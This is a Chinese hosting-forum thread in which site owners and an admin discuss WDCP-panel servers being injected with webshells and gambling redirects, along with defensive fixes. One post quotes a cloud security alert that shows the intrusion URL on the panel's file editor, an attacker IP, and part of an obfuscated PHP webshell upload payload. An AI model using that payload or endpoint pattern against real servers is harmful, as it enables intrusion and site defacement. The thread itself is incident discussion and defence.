[求助] 最近網(wǎng)站一直被掛馬，會不會是WDCP環(huán)境出什么安全問題了？

Rank: 1

17^#

發(fā)表于 2018-11-20 14:02 | 只看該作者

我現(xiàn)在已經(jīng)吧wdcp修改了端口，也不知道什么原因，無法訪問了，木馬文件我根據(jù)阿里的提示已經(jīng)刪除，先看一段時間，看是否還能上傳木馬文件。

Rank: 1

16^#

發(fā)表于 2018-11-20 14:01 | 只看該作者

回復 15# admin

wdcp的密碼我修改過。態(tài)勢里面提示了四十多條，所有的文件都是通過這個地址上傳上來的。并沒有干什么壞事，只是修改了主頁的信息，讓頁面回跳到首頁的時候跳到垃圾頁面。所有上傳的木馬全部經(jīng)過的加密處理。感覺這個是機器掃描直接植入的，而不是人工操作的。

AI導航網(wǎng)，AI網(wǎng)站大全，AI工具大全，AI軟件大全，AI工具集合，AI編程，AI繪畫，AI寫作，AI視頻生成，AI對話聊天等，盡在aiaiV.cn

admin

管理員

Rank: 9 Rank: 9 Rank: 9

15^#

發(fā)表于 2018-11-19 16:34 | 只看該作者

回復 13# steven001

密碼我修改過，直接寫入的文件。
這個是什么意思？

阿里態(tài)勢，這個也不一定準確吧？要看這個是否成功訪問的狀態(tài)
阿里給的警報，有時不太可信，在V2版本里，阿里把wdcp里的一個文件，只要這個文件存在，就危險，哪怕這個文件是空文件

看清提問三步曲及多看教程/FAQ索引(wdcp,v3,一鍵包,wdOS),益處多多.wdcp工具集阿里云主機8折優(yōu)惠碼

Rank: 1

14^#

發(fā)表于 2018-11-19 09:02 | 只看該作者

linux系統(tǒng)也沒有新增用戶，系統(tǒng)漏洞也清理了。

Rank: 1

13^#

發(fā)表于 2018-11-19 08:48 | 只看該作者

回復 12# admin

你好，管理員，這是阿里態(tài)勢給出的提示，肯定是沒有登陸的。密碼我修改過，直接寫入的文件。

admin

管理員

Rank: 9 Rank: 9 Rank: 9

12^#

發(fā)表于 2018-11-14 21:52 | 只看該作者

沒登錄的話，這個是不可能寫得了文件的
你可以復制地址或路徑試試看

看清提問三步曲及多看教程/FAQ索引(wdcp,v3,一鍵包,wdOS),益處多多.wdcp工具集阿里云主機8折優(yōu)惠碼

AI導航網(wǎng)，AI網(wǎng)站大全，AI工具大全，AI軟件大全，AI工具集合，AI編程，AI繪畫，AI寫作，AI視頻生成，AI對話聊天等，盡在aiaiV.cn

Rank: 1

11^#

發(fā)表于 2018-11-14 15:10 | 只看該作者

目前我做了一個服務器策略，臨時解決。所有目錄不允許寫入，upload目錄允許寫入但是不允許執(zhí)行

Rank: 1

10^#

發(fā)表于 2018-11-14 13:43 | 只看該作者

回復 9# admin

肯定是沒有登陸掛馬。通過這個地址掛的，是阿里的態(tài)勢感知提示的。并且是能夠通過這個寫入文件，以下是相關的信息。請盡快測試。謝謝！掛了好多馬，并且跟樓主一樣，在主頁寫入了博彩的相關信息，并進行了加密。javascript進行解密

疑似攻擊者IP
222.247.108.16
入侵點URL

XXXXXX:8080/sys/filee?act=edit&t=f&p=/www/web/XXXXXXXX/public_html/upload/201612/1482310143.php
Http Payload

------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="fn"

/www/web/XXXXXXX/public_html/upload/201612/1482310143.php
------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="furl"

/sys/file?p=%2fwww%2fweb%2fwww_XXXXX_com%2fpublic_html%2fupload/201612&act=list&t=d
------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="contents"

<?php error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."er");$dn=$sr/*+/*+*/("em"."anr"."id");$od=$sr/*+/*+*/("ri"."dne"."po");$rd=$sr/*+/*+*/("ri"."dda"."er");$cd=$sr/*+/*+*/("ri"."deso"."lc");$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");$muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");$dlform='<form method="post">FN:<input name="fn" size="20" type="text">URL:<input name="url" size="50" type="text"><input type="submit" value="ok"></form>';$ulform='<form method="post" enc
Http user_agent

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
被寫入的可疑文件路徑

/www/web/XXXXXXpublic_html/upload/201612/1482310143.php
事件說明

云盾檢測到有疑似黑客在通過WEB漏洞或者WEBSHELL向服務器寫入WEBSHELL文件或可疑的二進制文件，請及時關注。
解決方案

請及時排查告警中的URL對應的磁盤文件是否存在漏洞，或者是否是WEBSHELL，并及時修復WEB漏洞及刪除已存在的WEBSHELL文件。如果該URL接口是您網(wǎng)站正常的文件上傳接口，請在控制臺點擊標記為誤報或忽略按鈕。

admin

管理員

Rank: 9 Rank: 9 Rank: 9

9^#

發(fā)表于 2018-11-14 10:28 | 只看該作者

登錄了后臺掛馬？
有登錄后臺的權限，哪還需要掛，直接上傳就可以，要多少有多少？

如果沒登錄，用這個地址，能掛上來？

看清提問三步曲及多看教程/FAQ索引(wdcp,v3,一鍵包,wdOS),益處多多.wdcp工具集阿里云主機8折優(yōu)惠碼

Rank: 1

8^#

發(fā)表于 2018-11-14 09:32 | 只看該作者

XXXX:8080/sys/filee?act=edit&t=f&p=/www/web/XXXXXX/public_html/upload/201612/1482310143.php

我也是經(jīng)常被掛馬
通過這個地址掛上來的。這個是wdcp的文件吧

akme8

Rank: 1

7^#

發(fā)表于 2018-10-26 09:34 | 只看該作者

本帖最后由 akme8 于 2018-10-26 09:42 編輯

我之前也遇到了這個問題，我最近修補了網(wǎng)站的補丁，改了后臺地址，刪掉一些不常用的管理員賬號，在ftp上刪掉那些不屬于你的文件，還有改了ftp端口號，那些賬號密碼能改的都改掉，這一周來暫時都沒有類似的情況出現(xiàn)，希望對你有幫助。